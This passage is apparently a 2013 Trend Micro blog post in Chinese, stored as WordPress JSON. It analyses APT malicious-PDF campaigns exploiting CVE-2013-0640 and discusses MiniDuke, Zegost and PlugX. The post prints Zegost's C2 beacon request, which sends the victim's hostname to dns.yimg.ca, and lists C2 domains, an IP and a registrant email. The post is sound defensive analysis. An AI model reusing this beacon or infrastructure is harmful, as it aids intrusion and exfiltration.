{"id":5030,"date":"2013-06-25T09:01:23","date_gmt":"2013-06-25T01:01:23","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=5030"},"modified":"2019-03-13T10:59:10","modified_gmt":"2019-03-13T02:59:10","slug":"apt-%e6%94%bb%e6%93%8a%e8%97%89%e7%94%b1%e6%83%a1%e6%84%8fpdf%e6%94%bb%e6%93%8a%e7%a8%8b%e5%bc%8f%e7%a2%bc%e5%a4%a7%e9%87%8f%e5%a2%9e%e5%8a%a0%e4%b8%ad","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=5030","title":{"rendered":"APT \u653b\u64ca\u85c9\u7531\u60e1\u610fPDF\u653b\u64ca\u7a0b\u5f0f\u78bc\u5927\u91cf\u589e\u52a0\u4e2d"},"content":{"rendered":"

\u57282012\u5e74\u88e1\uff0c\u6211\u5011\u770b\u5230\u4e86\u5404\u5f0f\u5404\u6a23\u7684<\/a>APT\u653b\u64ca\u6d3b\u52d5<\/a>\u5229\u7528Microsoft Word\u7684\u6f0f\u6d1e \u2013 CVE-2012-0158\u3002\u9019\u662f\u4e00\u7a2e\u8f49\u8b8a<\/a>\uff0c\u4e4b\u524d\u6700\u5e38\u88ab\u5229\u7528\u7684Word\u6f0f\u6d1e\u662fCVE-2010-3333\u3002\u96d6\u7136\u6211\u5011\u9084\u662f\u7e7c\u7e8c\u770b\u5230CVE-2012-0158\u88ab\u5927\u91cf\u7684\u4f7f\u7528\uff0c\u4e0d\u904e\u6211\u5011\u4e5f\u6ce8\u610f\u5230\u60e1\u540d\u662d\u5f70\u7684\u300cMiniDuke<\/a>\u300d\u653b\u64ca\u6240\u88fd\u9020\u91dd\u5c0dAdobe Reader\u6f0f\u6d1e<\/a> \u2013 CVE-2013-0640\u7684\u653b\u64ca\u7a0b\u5f0f\u78bc\u4f7f\u7528\u91cf\u7684\u589e\u52a0\u3002\u9019\u4e9b\u60e1\u610fPDF\u6a94\u6848\u6240\u690d\u5165\u7684\u60e1\u610f\u8edf\u9ad4\u548cMiniDuke\u4e26\u7121\u95dc\u806f\uff0c\u4f46\u537b\u548c\u6b63\u5728\u9032\u884c\u4e2d\u7684APT-\u9032\u968e\u6301\u7e8c\u6027\u6ef2\u900f\u653b\u64ca (Advanced Persistent Threat, APT)<\/a>\u6d3b\u52d5\u6709\u95dc\u3002<\/p>\n

\"APT
APT \u653b\u64ca\u85c9\u7531\u60e1\u610fPDF\u653b\u64ca\u7a0b\u5f0f\u78bc\u5927\u91cf\u589e\u52a0\u4e2d<\/figcaption><\/figure>\n

Zegost<\/i><\/p>\n

\u8da8\u52e2\u79d1\u6280<\/a>\u6240\u767c\u73fe\u7684\u4e00\u7d44\u60e1\u610fPDF\u6a94\u6848\uff0c\u85cf\u6709\u4e0a\u8ff0\u6f0f\u6d1e\u653b\u64ca\u78bc\u7684\u8a98\u990c\u6587\u7ae0\u4f7f\u7528\u7684\u662f\u8d8a\u5357\u6587\uff0c\u6a94\u6848\u540d\u7a31\u4e5f\u662f\u76f8\u540c\u7684\u8a9e\u8a00\u3002<\/p>\n

\"APT
\u5716\u4e00\u3001\u8a98\u990c\u6587\u4ef6\u6a23\u672c<\/figcaption><\/figure>\n

\u9019\u4e9bPDF\u6a94\u6848\u5167\u5d4c\u8457\u548cMiniDuke\u653b\u64ca\u6d3b\u52d5\u6240\u4f7f\u7528\u985e\u4f3c\u7684JavaScript\u7a0b\u5f0f\u78bc\u3002\u76f8\u4f3c\u4e4b\u8655\u5305\u62ec\u4e86\u985e\u4f3c\u7684\u51fd\u6578\u548c\u8b8a\u6578\u540d\u7a31\u3002<\/p>\n

\"APT
\u5716\u4e8c\u3001\u985e\u4f3c\u7684JavaScript\u7a0b\u5f0f\u78bc<\/figcaption><\/figure>\n

\u4f7f\u7528Didier Steven\u7684PDFiD<\/a>\u5de5\u5177\u4f86\u5206\u6790\u9019PDF\u6a94\u6848\uff0c\u986f\u793a\u51fa\u9019\u5169\u500bPDF\u6a94\u6848\u975e\u5e38\u76f8\u4f3c\u3002\u96d6\u7136\u4e26\u975e\u5b8c\u5168\u76f8\u540c\uff0c\u4f46\u5169\u8005\u4e4b\u9593\u7684\u76f8\u4f3c\u4e4b\u8655\u662f\u96e3\u4ee5\u5426\u8a8d\u7684\u3002\u6709\u610f\u601d\u7684\u5730\u65b9\u662f\u300c\/Javascript\u300d\u3001\u300c\/OpenAction\u300d\u548c\u300c\/Page\u300d\u3002\u9019\u4e9b\u5730\u65b9\u4ee3\u8868\u8457\u6709JavaScript\u51fa\u73fe\uff0c\u6709\u67d0\u7a2e\u81ea\u52d5\u884c\u70ba\u51fa\u73fe\u548c\u9801\u78bc\u3002\u9019\u4e09\u500b\u9805\u76ee\u53ef\u4ee5\u5e6b\u6211\u5011\u78ba\u8a8dMiniDuke\u548cZegost\u7684\u76f8\u4f3c\u4e4b\u8655\u3002<\/p>\n

<\/p>\n

\u690d\u5165\u7684\u6a94\u6848\u548c\u8cc7\u6599\u4e5f\u5dee\u4e0d\u591a\u3002\u9019\u5169\u7a2e\u653b\u64ca\u6d3b\u52d5\u90fd\u690d\u5165\u76f8\u540c\u6578\u91cf\u7684\u6a94\u6848\uff0c\u6709\u8457\u975e\u5e38\u76f8\u4f3c\u7684\u6a94\u6848\u540d\u7a31\u8207\u985e\u4f3c\u7684\u76ee\u7684\u3002\u5373\u4f7f\u8a3b\u518a\u8868\u7684\u4fee\u6539\u90e8\u5206\u4e5f\u5f88\u985e\u4f3c\u3002<\/p>\n

\u4e0d\u904e\u9019\u4e5f\u662f\u76f8\u4f3c\u7684\u5168\u90e8\u5730\u65b9\u3002\u9019\u4e9bPDF\u6240\u690d\u5165\u7684\u6a94\u6848\u88ab\u7a31\u70baZegost\uff08\u6216HTTPTunnel\uff09\uff0c\u66fe\u7d93\u5728\u4e4b\u524d<\/a>\u7684\u653b\u64ca\u88e1\u88ab\u767c\u73fe\u904e\u3002\u548cMiniDuke\u653b\u64ca\u6240\u690d\u5165\u7684\u60e1\u610f\u8edf\u9ad4\u4e26\u7121\u95dc\u806f\u3002Zegost\u60e1\u610f\u8edf\u9ad4\u6709\u500b\u9bae\u660e\u7684\u7279\u5fb5\uff1a<\/p>\n

GET \/cgi\/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP\/1.1<\/p>\n

User-Agent: Mozilla\/4.0 (compatible; MSIE 6.0; Win32)<\/p>\n

Host: dns.yimg.ca<\/p>\n

Cache-Control: no-cache<\/p>\n

\u547d\u4ee4\u548c\u63a7\u5236\u4f3a\u670d\u5668 \u2013 dns.yimg.ca<\/i>\u6240\u53cd\u67e5\u51fa\u7684IP \u2013 223.26.55.122\uff0c\u4e00\u76f4\u88ab\u7528\u5728\u6bd4\u8f03\u77e5\u540d\u7684\u547d\u4ee4\u548c\u63a7\u5236\u4f3a\u670d\u5668\u4e0a\uff0c\u50cf\u662fimm.conimes.com<\/i>\u548ciyy.conimes.com<\/i>\u3002\u7528\u4f86\u8a3b\u518a\u9019\u7db2\u57df\u7684\u96fb\u5b50\u90f5\u4ef6\u5730\u5740 \u2013 llssddzz@gmail.com<\/i>\uff0c\u4e5f\u88ab\u7528\u4f86\u8a3b\u518ascvhosts.com<\/i>\uff08\u53e6\u5916\u4e00\u500b\u5df2\u77e5<\/a>\u7684C\uff06C\u4f3a\u670d\u5668\u5668\uff09\u548cupdata-microsoft.com<\/i>\uff0c\u61c9\u8a72\u4e5f\u662f\u6709\u554f\u984c\u7684\u7db2\u57df\u3002<\/p>\n

PlugX<\/a> (<\/i>\u5ba2\u88fd\u5316\u7684\u9060\u7aef\u5b58\u53d6\u5de5\u5177, \u91dd\u5c0d\u81fa\u7063\u5728\u5167\u7279\u5b9a\u76ee\u6a19\u767c\u52d5 APT \u653b\u64ca<\/a>))<\/i><\/p>\n

\u7b2c\u4e8c\u7d44\u7684\u60e1\u610fPDF\u6a94\u6848\u9593\u4e26\u4e0d\u4e00\u5b9a\u90fd\u76f4\u63a5\u6709\u95dc\u9023\uff0c\u96d6\u7136\u5b83\u5011\u90fd\u6703\u503c\u5165\u4e0d\u540c\u7684PlugX<\/a>\u8b8a\u7a2e\u3002\u6211\u5011\u6240\u5206\u6790\u7684\u653b\u64ca\u4f3c\u4e4e\u91dd\u5c0d\u8457\u65e5\u672c\u3001\u97d3\u570b\u548c\u5370\u5ea6\u7684\u76ee\u6a19\u3002<\/p>\n

\u7136\u800c\uff0c\u96d6\u7136\u9019\u4e9b\u653b\u64ca\u4e5f\u662f\u5229\u7528\u6f0f\u6d1e \u2013 CVE-2013-0640\uff0c\u4f46\u662f\u5b83\u5011\u548c\u4e0a\u9762\u6240\u8a0e\u8ad6\u7684\u6a23\u672c\u4e0d\u540c\u3002\u6bd4\u8f03\u6a94\u6848\u6642\u5c31\u53ef\u4ee5\u770b\u51fa\u5dee\u7570\uff0c\u6bd4\u65b9\u8aaa\u4f7f\u7528\u7684PDF\u683c\u5f0f\u7248\u672c\uff1a<\/p>\n